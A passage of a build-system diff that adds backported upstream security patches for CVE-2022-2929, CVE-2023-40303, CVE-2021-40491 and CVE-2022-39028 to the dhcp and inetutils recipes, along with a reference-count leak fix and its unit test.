+diff --git a/common/options.c b/common/options.c
+index a7ed84c..4e53bb4 100644
+--- a/common/options.c
++++ b/common/options.c
+@@ -4452,6 +4452,8 @@ add_option(struct option_state *options,
+ 	if (!option_cache_allocate(&oc, MDL)) {
+ 		log_error("No memory for option cache adding %s (option %d).",
+ 			  option->name, option_num);
++		/* Get rid of reference created during hash lookup. */
++		option_dereference(&option, MDL);
+ 		return 0;
+ 	}
+ 
+@@ -4463,6 +4465,8 @@ add_option(struct option_state *options,
+ 			     MDL)) {
+ 		log_error("No memory for constant data adding %s (option %d).",
+ 			  option->name, option_num);
++		/* Get rid of reference created during hash lookup. */
++		option_dereference(&option, MDL);
+ 		option_cache_dereference(&oc, MDL);
+ 		return 0;
+ 	}
+@@ -4471,6 +4475,9 @@ add_option(struct option_state *options,
+ 	save_option(&dhcp_universe, options, oc);
+ 	option_cache_dereference(&oc, MDL);
+ 
++	/* Get rid of reference created during hash lookup. */
++	option_dereference(&option, MDL);
++
+ 	return 1;
+ }
+ 
+diff --git a/common/tests/option_unittest.c b/common/tests/option_unittest.c
+index cd52cfb..690704d 100644
+--- a/common/tests/option_unittest.c
++++ b/common/tests/option_unittest.c
+@@ -130,6 +130,59 @@ ATF_TC_BODY(pretty_print_option, tc)
+ }
+ 
+ 
++ATF_TC(add_option_ref_cnt);
++
++ATF_TC_HEAD(add_option_ref_cnt, tc)
++{
++    atf_tc_set_md_var(tc, "descr",
++        "Verify add_option() does not leak option ref counts.");
++}
++
++ATF_TC_BODY(add_option_ref_cnt, tc)
++{
++    struct option_state *options = NULL;
++    struct option *option = NULL;
++    unsigned int cid_code = DHO_DHCP_CLIENT_IDENTIFIER;
++    char *cid_str = "1234";
++    int refcnt_before = 0;
++
++    // Look up the option we're going to add.
++    initialize_common_option_spaces();
++    if (!option_code_hash_lookup(&option, dhcp_universe.code_hash,
++                                 &cid_code, 0, MDL)) {
++        atf_tc_fail("cannot find option definition?");
++    }
++
++    // Get the option's reference count before we call add_options.
++    refcnt_before = option->refcnt;
++
++    // Allocate a option_state to which to add an option.
++    if (!option_state_allocate(&options, MDL)) {
++	    atf_tc_fail("cannot allocat options state");
++    }
++
++    // Call add_option() to add the option to the option state.
++    if (!add_option(options, cid_code, cid_str, strlen(cid_str))) {
++	    atf_tc_fail("add_option returned 0");
++    }
++
++    // Verify that calling add_option() only adds 1 to the option ref count.
++    if (option->refcnt != (refcnt_before + 1)) {
++        atf_tc_fail("after add_option(), count is wrong, before %d, after: %d",
++                    refcnt_before, option->refcnt);
++    }
++
++    // Derefrence the option_state, this should reduce the ref count to
++    // it's starting value.
++    option_state_dereference(&options, MDL);
++
++    // Verify that dereferencing option_state restores option ref count.
++    if (option->refcnt != refcnt_before) {
++        atf_tc_fail("after state deref, count is wrong, before %d, after: %d",
++                    refcnt_before, option->refcnt);
++    }
++}
++
+ /* This macro defines main() method that will call specified
+    test cases. tp and simple_test_case names can be whatever you want
+    as long as it is a valid variable identifier. */
+@@ -137,6 +190,7 @@ ATF_TP_ADD_TCS(tp)
+ {
+     ATF_TP_ADD_TC(tp, option_refcnt);
+     ATF_TP_ADD_TC(tp, pretty_print_option);
++    ATF_TP_ADD_TC(tp, add_option_ref_cnt);
+ 
+     return (atf_no_error());
+ }
+-- 
+2.25.1
+
diff --git a/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2929.patch b/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2929.patch
new file mode 100644
index 0000000000..d605204f89
--- /dev/null
+++ b/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2929.patch
@@ -0,0 +1,40 @@
+From 5c959166ebee7605e2048de573f2475b4d731ff7 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 6 Oct 2022 09:42:59 +0530
+Subject: [PATCH] CVE-2022-2929
+
+Upstream-Status: Backport [https://downloads.isc.org/isc/dhcp/4.4.3-P1/patches/]
+CVE: CVE-2022-2929
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ common/options.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/common/options.c b/common/options.c
+index 4e53bb4..28800fc 100644
+--- a/common/options.c
++++ b/common/options.c
+@@ -454,16 +454,16 @@ int fqdn_universe_decode (struct option_state *options,
+ 		while (s < &bp -> data[0] + length + 2) {
+ 			len = *s;
+ 			if (len > 63) {
+-				log_info ("fancy bits in fqdn option");
+-				return 0;
++				log_info ("label length exceeds 63 in fqdn option");
++				goto bad;
+ 			}
+ 			if (len == 0) {
+ 				terminated = 1;
+ 				break;
+ 			}
+ 			if (s + len > &bp -> data [0] + length + 3) {
+-				log_info ("fqdn tag longer than buffer");
+-				return 0;
++				log_info ("fqdn label longer than buffer");
++				goto bad;
+ 			}
+ 
+ 			if (first_len == 0) {
+-- 
+2.25.1
+
diff --git a/meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb b/meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb
index b56a204821..d3c87d0d07 100644
--- a/meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb
+++ b/meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb
@@ -10,6 +10,9 @@ SRC_URI += "file://0001-define-macro-_PATH_DHCPD_CONF-and-_PATH_DHCLIENT_CON.pat
             file://0012-dhcp-correct-the-intention-for-xml2-lib-search.patch \
             file://0013-fixup_use_libbind.patch \
             file://0001-workaround-busybox-limitation-in-linux-dhclient-script.patch \
+            file://CVE-2021-25217.patch \
+            file://CVE-2022-2928.patch \
+            file://CVE-2022-2929.patch \
 "
 
 SRC_URI[md5sum] = "2afdaf8498dc1edaf3012efdd589b3e1"
diff --git a/meta/recipes-connectivity/inetutils/inetutils/0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch b/meta/recipes-connectivity/inetutils/inetutils/0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch
new file mode 100644
index 0000000000..aea07bd803
--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch
@@ -0,0 +1,283 @@
+From 703418fe9d2e3b1e8d594df5788d8001a8116265 Mon Sep 17 00:00:00 2001
+From: Jeffrey Bencteux <jeffbencteux@gmail.com>
+Date: Fri, 30 Jun 2023 19:02:45 +0200
+Subject: [PATCH] CVE-2023-40303: ftpd,rcp,rlogin,rsh,rshd,uucpd: fix: check
+ set*id() return values
+
+Several setuid(), setgid(), seteuid() and setguid() return values
+were not checked in ftpd/rcp/rlogin/rsh/rshd/uucpd code potentially
+leading to potential security issues.
+
+CVE: CVE-2023-40303
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=e4e65c03f4c11292a3e40ef72ca3f194c8bffdd6]
+Signed-off-by: Jeffrey Bencteux <jeffbencteux@gmail.com>
+Signed-off-by: Simon Josefsson <simon@josefsson.org>
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ ftpd/ftpd.c  | 10 +++++++---
+ src/rcp.c    | 39 +++++++++++++++++++++++++++++++++------
+ src/rlogin.c | 11 +++++++++--
+ src/rsh.c    | 25 +++++++++++++++++++++----
+ src/rshd.c   | 20 +++++++++++++++++---
+ src/uucpd.c  | 15 +++++++++++++--
+ 6 files changed, 100 insertions(+), 20 deletions(-)
+
+diff --git a/ftpd/ftpd.c b/ftpd/ftpd.c
+index 5db88d0..b52b122 100644
+--- a/ftpd/ftpd.c
++++ b/ftpd/ftpd.c
+@@ -862,7 +862,9 @@ end_login (struct credentials *pcred)
+   char *remotehost = pcred->remotehost;
+   int atype = pcred->auth_type;
+ 
+-  seteuid ((uid_t) 0);
++  if (seteuid ((uid_t) 0) == -1)
++    _exit (EXIT_FAILURE);
++
+   if (pcred->logged_in)
+     {
+       logwtmp_keep_open (ttyline, "", "");
+@@ -1151,7 +1153,8 @@ getdatasock (const char *mode)
+ 
+   if (data >= 0)
+     return fdopen (data, mode);
+-  seteuid ((uid_t) 0);
++  if (seteuid ((uid_t) 0) == -1)
++    _exit (EXIT_FAILURE);
+   s = socket (ctrl_addr.ss_family, SOCK_STREAM, 0);
+   if (s < 0)
+     goto bad;
+@@ -1978,7 +1981,8 @@ passive (int epsv, int af)
+   else	/* !AF_INET6 */
+     ((struct sockaddr_in *) &pasv_addr)->sin_port = 0;
+ 
+-  seteuid ((uid_t) 0);
++  if (seteuid ((uid_t) 0) == -1)
++    _exit (EXIT_FAILURE);
+   if (bind (pdata, (struct sockaddr *) &pasv_addr, pasv_addrlen) < 0)
+     {
+       if (seteuid ((uid_t) cred.uid))
+diff --git a/src/rcp.c b/src/rcp.c
+index bafa35f..366295c 100644
+--- a/src/rcp.c
++++ b/src/rcp.c
+@@ -347,14 +347,23 @@ main (int argc, char *argv[])
+   if (from_option)
+     {				/* Follow "protocol", send data. */
+       response ();
+-      setuid (userid);
++
++      if (setuid (userid) == -1)
++      {
++        error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++      }
++
+       source (argc, argv);
+       exit (errs);
+     }
+ 
+   if (to_option)
+     {				/* Receive data. */
+-      setuid (userid);
++      if (setuid (userid) == -1)
++      {
++        error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++      }
++
+       sink (argc, argv);
+       exit (errs);
+     }
+@@ -539,7 +548,11 @@ toremote (char *targ, int argc, char *argv[])
+ 	      if (response () < 0)
+ 		exit (EXIT_FAILURE);
+ 	      free (bp);
+-	      setuid (userid);
++
++	      if (setuid (userid) == -1)
++              {
++                error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++              }
+ 	    }
+ 	  source (1, argv + i);
+ 	  close (rem);
+@@ -634,7 +647,12 @@ tolocal (int argc, char *argv[])
+ 	  ++errs;
+ 	  continue;
+ 	}
+-      seteuid (userid);
++
++      if (seteuid (userid) == -1)
++      {
++        error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
++      }
++
+ #if defined IP_TOS && defined IPPROTO_IP && defined IPTOS_THROUGHPUT
+       sslen = sizeof (ss);
+       (void) getpeername (rem, (struct sockaddr *) &ss, &sslen);
+@@ -647,7 +665,12 @@ tolocal (int argc, char *argv[])
+ #endif
+       vect[0] = target;
+       sink (1, vect);
+-      seteuid (effuid);
++
++      if (seteuid (effuid) == -1)
++      {
++        error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
++      }
++
+       close (rem);
+       rem = -1;
+ #ifdef SHISHI
+@@ -1453,7 +1476,11 @@ susystem (char *s, int userid)
+       return (127);
+ 
+     case 0:
+-      setuid (userid);
++      if (setuid (userid) == -1)
++      {
++        error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++      }
++
+       execl (PATH_BSHELL, "sh", "-c", s, NULL);
+       _exit (127);
+     }
+diff --git a/src/rlogin.c b/src/rlogin.c
+index e5e11a7..6b38901 100644
+--- a/src/rlogin.c
++++ b/src/rlogin.c
+@@ -649,8 +649,15 @@ try_connect:
+   /* Now change to the real user ID.  We have to be set-user-ID root
+      to get the privileged port that rcmd () uses.  We now want, however,
+      to run as the real user who invoked us.  */
+-  seteuid (uid);
+-  setuid (uid);
++  if (seteuid (uid) == -1)
++  {
++    error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
++  }
++
++  if (setuid (uid) == -1)
++  {
++    error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++  }
+ 
+   doit (&osmask);	/* The old mask will activate SIGURG and SIGUSR1!  */
+ 
+diff --git a/src/rsh.c b/src/rsh.c
+index bd70372..b451a70 100644
+--- a/src/rsh.c
++++ b/src/rsh.c
+@@ -278,8 +278,17 @@ main (int argc, char **argv)
+     {
+       if (asrsh)
+ 	*argv = (char *) "rlogin";
+-      seteuid (getuid ());
+-      setuid (getuid ());
++
++      if (seteuid (getuid ()) == -1)
++      {
++        error (EXIT_FAILURE, errno, "seteuid() failed");
++      }
++
++      if (setuid (getuid ()) == -1)
++      {
++        error (EXIT_FAILURE, errno, "setuid() failed");
++      }
++
+       execv (PATH_RLOGIN, argv);
+       error (EXIT_FAILURE, errno, "cannot execute %s", PATH_RLOGIN);
+     }
+@@ -543,8 +552,16 @@ try_connect:
+ 	error (0, errno, "setsockopt DEBUG (ignored)");
+     }
+ 
+-  seteuid (uid);
+-  setuid (uid);
++  if (seteuid (uid) == -1)
++  {
++    error (EXIT_FAILURE, errno, "seteuid() failed");
++  }
++
++  if (setuid (uid) == -1)
++  {
++    error (EXIT_FAILURE, errno, "setuid() failed");
++  }
++
+ #ifdef HAVE_SIGACTION
+   sigemptyset (&sigs);
+   sigaddset (&sigs, SIGINT);
+diff --git a/src/rshd.c b/src/rshd.c
+index b824a10..8cdcd06 100644
+--- a/src/rshd.c
++++ b/src/rshd.c
+@@ -1848,8 +1848,18 @@ doit (int sockfd, struct sockaddr *fromp, socklen_t fromlen)
+     pwd->pw_shell = PATH_BSHELL;
+ 
+   /* Set the gid, then uid to become the user specified by "locuser" */
+-  setegid ((gid_t) pwd->pw_gid);
+-  setgid ((gid_t) pwd->pw_gid);
++  if (setegid ((gid_t) pwd->pw_gid) == -1)
++  {
++    rshd_error ("Cannot drop privileges (setegid() failed)\n");
++    exit (EXIT_FAILURE);
++  }
++
++  if (setgid ((gid_t) pwd->pw_gid) == -1)
++  {
++    rshd_error ("Cannot drop privileges (setgid() failed)\n");
++    exit (EXIT_FAILURE);
++  }
++
+ #ifdef HAVE_INITGROUPS
+   initgroups (pwd->pw_name, pwd->pw_gid);	/* BSD groups */
+ #endif
+@@ -1871,7 +1881,11 @@ doit (int sockfd, struct sockaddr *fromp, socklen_t fromlen)
+     }
+ #endif /* WITH_PAM */
+ 
+-  setuid ((uid_t) pwd->pw_uid);
++  if (setuid ((uid_t) pwd->pw_uid) == -1)
++  {
++    rshd_error ("Cannot drop privileges (setuid() failed)\n");
++    exit (EXIT_FAILURE);
++  }
+ 
+   /* We'll execute the client's command in the home directory
+    * of locuser. Note, that the chdir must be executed after
+diff --git a/src/uucpd.c b/src/uucpd.c
+index 55c3d44..6aba294 100644
+--- a/src/uucpd.c
++++ b/src/uucpd.c
+@@ -254,7 +254,12 @@ doit (struct sockaddr *sap, socklen_t salen)
+   sprintf (Username, "USER=%s", user);
+   sprintf (Logname, "LOGNAME=%s", user);
+   dologin (pw, sap, salen);
+-  setgid (pw->pw_gid);
++
++  if (setgid (pw->pw_gid) == -1)
++  {
++    fprintf (stderr, "setgid() failed");
++    return;
++  }
+ #ifdef HAVE_INITGROUPS
+   initgroups (pw->pw_name, pw->pw_gid);
+ #endif
+@@ -263,7 +268,13 @@ doit (struct sockaddr *sap, socklen_t salen)
+       fprintf (stderr, "Login incorrect.");
+       return;
+     }
+-  setuid (pw->pw_uid);
++
++  if (setuid (pw->pw_uid) == -1)
++  {
++    fprintf (stderr, "setuid() failed");
++    return;
++  }
++
+   execl (uucico_location, "uucico", NULL);
+   perror ("uucico server: execl");
+ }
+-- 
+2.25.1
+
diff --git a/meta/recipes-connectivity/inetutils/inetutils/0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch b/meta/recipes-connectivity/inetutils/inetutils/0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch
new file mode 100644
index 0000000000..4bc354d256
--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch
@@ -0,0 +1,254 @@
+From 70fe022f9dac760eaece0228cad17e3d29a57fb8 Mon Sep 17 00:00:00 2001
+From: Simon Josefsson <simon@josefsson.org>
+Date: Mon, 31 Jul 2023 13:59:05 +0200
+Subject: [PATCH] CVE-2023-40303: Indent changes in previous commit.
+
+CVE: CVE-2023-40303
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=9122999252c7e21eb7774de11d539748e7bdf46d]
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/rcp.c    | 42 ++++++++++++++++++++++++------------------
+ src/rlogin.c | 12 ++++++------
+ src/rsh.c    | 24 ++++++++++++------------
+ src/rshd.c   | 24 ++++++++++++------------
+ src/uucpd.c  | 16 ++++++++--------
+ 5 files changed, 62 insertions(+), 56 deletions(-)
+
+diff --git a/src/rcp.c b/src/rcp.c
+index cdcf8500..652f22e6 100644
+--- a/src/rcp.c
++++ b/src/rcp.c
+@@ -347,9 +347,10 @@ main (int argc, char *argv[])
+       response ();
+ 
+       if (setuid (userid) == -1)
+-      {
+-        error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+-      }
++	{
++	  error (EXIT_FAILURE, 0,
++		 "Could not drop privileges (setuid() failed)");
++	}
+ 
+       source (argc, argv);
+       exit (errs);
+@@ -358,9 +359,10 @@ main (int argc, char *argv[])
+   if (to_option)
+     {				/* Receive data. */
+       if (setuid (userid) == -1)
+-      {
+-        error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+-      }
++	{
++	  error (EXIT_FAILURE, 0,
++		 "Could not drop privileges (setuid() failed)");
++	}
+ 
+       sink (argc, argv);
+       exit (errs);
+@@ -548,9 +550,10 @@ toremote (char *targ, int argc, char *argv[])
+ 	      free (bp);
+ 
+ 	      if (setuid (userid) == -1)
+-              {
+-                error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+-              }
++		{
++		  error (EXIT_FAILURE, 0,
++			 "Could not drop privileges (setuid() failed)");
++		}
+ 	    }
+ 	  source (1, argv + i);
+ 	  close (rem);
+@@ -645,9 +648,10 @@ tolocal (int argc, char *argv[])
+ 	}
+ 
+       if (seteuid (userid) == -1)
+-      {
+-        error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
+-      }
++	{
++	  error (EXIT_FAILURE, 0,
++		 "Could not drop privileges (seteuid() failed)");
++	}
+ 
+ #if defined IP_TOS && defined IPPROTO_IP && defined IPTOS_THROUGHPUT
+       sslen = sizeof (ss);
+@@ -663,9 +667,10 @@ tolocal (int argc, char *argv[])
+       sink (1, vect);
+ 
+       if (seteuid (effuid) == -1)
+-      {
+-        error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
+-      }
++	{
++	  error (EXIT_FAILURE, 0,
++		 "Could not drop privileges (seteuid() failed)");
++	}
+ 
+       close (rem);
+       rem = -1;
+@@ -1465,9 +1470,10 @@ susystem (char *s, int userid)
+ 
+     case 0:
+       if (setuid (userid) == -1)
+-      {
+-        error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+-      }
++	{
++	  error (EXIT_FAILURE, 0,
++		 "Could not drop privileges (setuid() failed)");
++	}
+ 
+       execl (PATH_BSHELL, "sh", "-c", s, NULL);
+       _exit (127);
+diff --git a/src/rlogin.c b/src/rlogin.c
+index c543de0c..4360202f 100644
+--- a/src/rlogin.c
++++ b/src/rlogin.c
+@@ -648,14 +648,14 @@ try_connect:
+      to get the privileged port that rcmd () uses.  We now want, however,
+      to run as the real user who invoked us.  */
+   if (seteuid (uid) == -1)
+-  {
+-    error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
+-  }
++    {
++      error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
++    }
+ 
+   if (setuid (uid) == -1)
+-  {
+-    error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+-  }
++    {
++      error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++    }
+ 
+   doit (&osmask);	/* The old mask will activate SIGURG and SIGUSR1!  */
+ 
+diff --git a/src/rsh.c b/src/rsh.c
+index 6f60667d..179b47cd 100644
+--- a/src/rsh.c
++++ b/src/rsh.c
+@@ -278,14 +278,14 @@ main (int argc, char **argv)
+ 	*argv = (char *) "rlogin";
+ 
+       if (seteuid (getuid ()) == -1)
+-      {
+-        error (EXIT_FAILURE, errno, "seteuid() failed");
+-      }
++	{
++	  error (EXIT_FAILURE, errno, "seteuid() failed");
++	}
+ 
+       if (setuid (getuid ()) == -1)
+-      {
+-        error (EXIT_FAILURE, errno, "setuid() failed");
+-      }
++	{
++	  error (EXIT_FAILURE, errno, "setuid() failed");
++	}
+ 
+       execv (PATH_RLOGIN, argv);
+       error (EXIT_FAILURE, errno, "cannot execute %s", PATH_RLOGIN);
+@@ -551,14 +551,14 @@ try_connect:
+     }
+ 
+   if (seteuid (uid) == -1)
+-  {
+-    error (EXIT_FAILURE, errno, "seteuid() failed");
+-  }
++    {
++      error (EXIT_FAILURE, errno, "seteuid() failed");
++    }
+ 
+   if (setuid (uid) == -1)
+-  {
+-    error (EXIT_FAILURE, errno, "setuid() failed");
+-  }
++    {
++      error (EXIT_FAILURE, errno, "setuid() failed");
++    }
+ 
+ #ifdef HAVE_SIGACTION
+   sigemptyset (&sigs);
+diff --git a/src/rshd.c b/src/rshd.c
+index 707790e7..3a153a18 100644
+--- a/src/rshd.c
++++ b/src/rshd.c
+@@ -1848,16 +1848,16 @@ doit (int sockfd, struct sockaddr *fromp, socklen_t fromlen)
+ 
+   /* Set the gid, then uid to become the user specified by "locuser" */
+   if (setegid ((gid_t) pwd->pw_gid) == -1)
+-  {
+-    rshd_error ("Cannot drop privileges (setegid() failed)\n");
+-    exit (EXIT_FAILURE);
+-  }
++    {
++      rshd_error ("Cannot drop privileges (setegid() failed)\n");
++      exit (EXIT_FAILURE);
++    }
+ 
+   if (setgid ((gid_t) pwd->pw_gid) == -1)
+-  {
+-    rshd_error ("Cannot drop privileges (setgid() failed)\n");
+-    exit (EXIT_FAILURE);
+-  }
++    {
++      rshd_error ("Cannot drop privileges (setgid() failed)\n");
++      exit (EXIT_FAILURE);
++    }
+ 
+ #ifdef HAVE_INITGROUPS
+   initgroups (pwd->pw_name, pwd->pw_gid);	/* BSD groups */
+@@ -1881,10 +1881,10 @@ doit (int sockfd, struct sockaddr *fromp, socklen_t fromlen)
+ #endif /* WITH_PAM */
+ 
+   if (setuid ((uid_t) pwd->pw_uid) == -1)
+-  {
+-    rshd_error ("Cannot drop privileges (setuid() failed)\n");
+-    exit (EXIT_FAILURE);
+-  }
++    {
++      rshd_error ("Cannot drop privileges (setuid() failed)\n");
++      exit (EXIT_FAILURE);
++    }
+ 
+   /* We'll execute the client's command in the home directory
+    * of locuser. Note, that the chdir must be executed after
+diff --git a/src/uucpd.c b/src/uucpd.c
+index 29cfce35..fde7b9c9 100644
+--- a/src/uucpd.c
++++ b/src/uucpd.c
+@@ -254,10 +254,10 @@ doit (struct sockaddr *sap, socklen_t salen)
+   dologin (pw, sap, salen);
+ 
+   if (setgid (pw->pw_gid) == -1)
+-  {
+-    fprintf (stderr, "setgid() failed");
+-    return;
+-  }
++    {
++      fprintf (stderr, "setgid() failed");
++      return;
++    }
+ #ifdef HAVE_INITGROUPS
+   initgroups (pw->pw_name, pw->pw_gid);
+ #endif
+@@ -268,10 +268,10 @@ doit (struct sockaddr *sap, socklen_t salen)
+     }
+ 
+   if (setuid (pw->pw_uid) == -1)
+-  {
+-    fprintf (stderr, "setuid() failed");
+-    return;
+-  }
++    {
++      fprintf (stderr, "setuid() failed");
++      return;
++    }
+ 
+   execl (uucico_location, "uucico", NULL);
+   perror ("uucico server: execl");
diff --git a/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch b/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch
new file mode 100644
index 0000000000..54252d6bc7
--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch
@@ -0,0 +1,67 @@
+From 4e355804d57d5686defc363c70f81e6f58cd08f0 Mon Sep 17 00:00:00 2001
+From: Simon Josefsson <simon@josefsson.org>
+Date: Fri, 17 Dec 2021 21:52:18 -0800
+Subject: [PATCH] ftp: check that PASV/LSPV addresses match.
+
+* NEWS: Mention change.
+* ftp/ftp.c (initconn): Validate returned addresses.
+
+CVE: CVE-2021-40491
+
+Upstream-Status: Backport
+[https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=58cb043b190fd04effdaea7c9403416b436e50dd]
+
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ ftp/ftp.c | 21 +++++++++++++++++++++
+ 1 file changed, 21 insertions(+)
+
+diff --git a/ftp/ftp.c b/ftp/ftp.c
+index 9813586..7c72cb2 100644
+--- a/ftp/ftp.c
++++ b/ftp/ftp.c
+@@ -1344,6 +1344,13 @@ initconn (void)
+ 		  uint32_t *pu32 = (uint32_t *) &data_addr_sa4->sin_addr.s_addr;
+ 		  pu32[0] = htonl ( (h[0] << 24) | (h[1] << 16) | (h[2] << 8) | h[3]);
+ 		}
++		if (data_addr_sa4->sin_addr.s_addr
++		    != ((struct sockaddr_in *) &hisctladdr)->sin_addr.s_addr)
++		  {
++		    printf ("Passive mode address mismatch.\n");
++		    (void) command ("ABOR");	/* Cancel any open connection.  */
++		    goto bad;
++		  }
+ 	    } /* LPSV IPv4 */
+ 	  else /* IPv6 */
+ 	    {
+@@ -1374,6 +1381,13 @@ initconn (void)
+ 		  pu32[2] = htonl ( (h[8] << 24) | (h[9] << 16) | (h[10] << 8) | h[11]);
+ 		  pu32[3] = htonl ( (h[12] << 24) | (h[13] << 16) | (h[14] << 8) | h[15]);
+ 		}
++		if (data_addr_sa6->sin6_addr.s6_addr
++		    != ((struct sockaddr_in6 *) &hisctladdr)->sin6_addr.s6_addr)
++		  {
++		    printf ("Passive mode address mismatch.\n");
++		    (void) command ("ABOR");	/* Cancel any open connection.  */
++		    goto bad;
++		  }
+ 	    } /* LPSV IPv6 */
+ 	}
+       else /* !EPSV && !LPSV */
+@@ -1394,6 +1408,13 @@ initconn (void)
+ 			 | ((a2 & 0xff) << 8) | (a3 & 0xff) );
+ 	      data_addr_sa4->sin_port =
+ 		  htons (((p0 & 0xff) << 8) | (p1 & 0xff));
++	      if (data_addr_sa4->sin_addr.s_addr
++		  != ((struct sockaddr_in *) &hisctladdr)->sin_addr.s_addr)
++		{
++		  printf ("Passive mode address mismatch.\n");
++		  (void) command ("ABOR");	/* Cancel any open connection.  */
++		  goto bad;
++		}
+ 	    } /* PASV */
+ 	  else
+ 	    {
+-- 
+2.25.1
+
diff --git a/meta/recipes-connectivity/inetutils/inetutils/CVE-2022-39028.patch b/meta/recipes-connectivity/inetutils/inetutils/CVE-2022-39028.patch
new file mode 100644
index 0000000000..da2da8da8a
--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/CVE-2022-39028.patch
@@ -0,0 +1,54 @@
+From eaae65aac967f9628787dca4a2501ca860bb6598 Mon Sep 17 00:00:00 2001
+From: Minjae Kim <flowergom@gmail.com>
+Date: Mon, 26 Sep 2022 22:05:07 +0200
+Subject: [PATCH] telnetd: Handle early IAC EC or IAC EL receipt
+
+Fix telnetd crash if the first two bytes of a new connection
+are 0xff 0xf7 (IAC EC) or 0xff 0xf8 (IAC EL).
+
+The problem was reported in:
+<https://pierrekim.github.io/blog/2022-08-24-2-byte-dos-freebsd-netbsd-telnetd-netkit-telnetd-inetutils-telnetd-kerberos-telnetd.html>.
+
+* NEWS: Mention fix.
+* telnetd/state.c (telrcv): Handle zero slctab[SLC_EC].sptr and
+zero slctab[SLC_EL].sptr.
+
+CVE: CVE-2022-39028
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=fae8263e467380483c28513c0e5fac143e46f94f]
+Signed-off-by: Minjae Kim<flowergom@gmail.com>
+---
+ telnetd/state.c | 12 +++++++++---
+ 1 file changed, 9 insertions(+), 3 deletions(-)
+
+diff --git a/telnetd/state.c b/telnetd/state.c
+index 2184bca..7948503 100644
+--- a/telnetd/state.c
++++ b/telnetd/state.c
+@@ -314,15 +314,21 @@ telrcv (void)
+ 	    case EC:
+ 	    case EL:
+ 	      {
+-		cc_t ch;
++		cc_t ch = (cc_t) (_POSIX_VDISABLE);
+ 
+ 		DEBUG (debug_options, 1, printoption ("td: recv IAC", c));
+ 		ptyflush ();	/* half-hearted */
+ 		init_termbuf ();
+ 		if (c == EC)
+-		  ch = *slctab[SLC_EC].sptr;
++		{
++		  if (slctab[SLC_EC].sptr)
++		    ch = *slctab[SLC_EC].sptr;
++		}
+ 		else
+-		  ch = *slctab[SLC_EL].sptr;
++		{
++		  if (slctab[SLC_EL].sptr)
++		    ch = *slctab[SLC_EL].sptr;
++		}
+ 		if (ch != (cc_t) (_POSIX_VDISABLE))
+ 		  pty_output_byte ((unsigned char) ch);
+ 		break;
+-- 
+2.25.1
+
diff --git a/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb b/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb
index cc9410b94e..3a68b34825 100644
--- a/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb
+++ b/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb
@@ -23,6 +23,10 @@ SRC_URI = "${GNU_MIRROR}/inetutils/inetutils-${PV}.tar.gz \
            file://inetutils-only-check-pam_appl.h-when-pam-enabled.patch \
            file://0001-rcp-fix-to-work-with-large-files.patch \
            file://fix-buffer-fortify-tfpt.patch \
+           file://CVE-2021-40491.patch \
+           file://CVE-2022-39028.patch \
+           file://0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch \
+           file://0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch \
 "
 
 SRC_URI[md5sum] = "04852c26c47cc8c6b825f2b74f191f52"
